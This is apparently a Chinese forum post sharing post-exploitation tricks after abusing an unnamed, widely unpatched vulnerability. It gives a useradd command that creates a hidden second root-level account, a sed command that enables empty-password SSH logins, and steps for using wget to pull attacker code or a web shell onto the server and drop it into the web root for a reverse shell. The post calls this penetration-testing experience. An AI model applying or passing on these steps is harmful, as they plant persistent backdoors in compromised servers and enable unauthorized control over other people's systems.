最近某漏洞比较泛滥
全球很多网站该漏洞都没修补 
直接可以管理员权限。
对于windows直接3389上去
对于linux需要费点功夫

首先添加管理员账号
执行命令
useradd -u 0  -o  -g root  -G root -d /home/admin admin 


说明:

-u 0 指将uid指定为0(零)与root相同,登录后的提示符为#而非$.

-o 指因为重复了uid(与root帐号的uid重复)必须指定这个参数.

-g root 初始化组的组名,当用户属于多个组时,(在-G参数中指定),登录时所在组。缺省该项时,系统新建一个与用户名同名的组,并且初始化时设为该组名.而不论-G指定为哪些组.

-G root 指定用户名所属的组列表,一个用户可以属于多个组,组名间用逗号分隔,组名必须已经存在.

-d /home/admin指定用户的属主目录

admin 新建的用户名为admin.

这样就添加了一个 有root权限的账户admin
由于在非交互式shell下无法设置密码 然后SSH空密码也无法登陆 比较纠结了
这时候就要修改配置文件 /etc/ssh/sshd_config 
把里面 PermitEmptyPasswords no 改为 PermitEmptyPasswords yes  即允许空密码登陆。
在非交互式shell下 该怎么修改这个配置文件里的某一行数据呢?
用sed命令可以实现
如下
sed -i 's/PermitEmptyPasswords no/PermitEmptyPasswords yes/g' file

当然也可以用c写代码来实现然后放到自己web服务器上wget过去 编译执行。
然后就可以SSH登陆了。

另外也可以获得一个webshell然后 反弹一个shell  ,但是怎么快速找到web物理路径呢?
在网站里随便找一张图片 看属性找到图片的名字比如1.jpg
然后执行locate 1.jpg可以快速查找到web物理路径
然后 wget 下载你的web***到服务器
再执行 mov shell.php 到web物理路径下。
可以得到webshell。当然webshell是非管理员权限。

以上是在***测试时的一点自己的经验,希望大家有设么好的经验或技巧来补充完善。
还有一些其他的小技巧 我会陆续慢慢补充。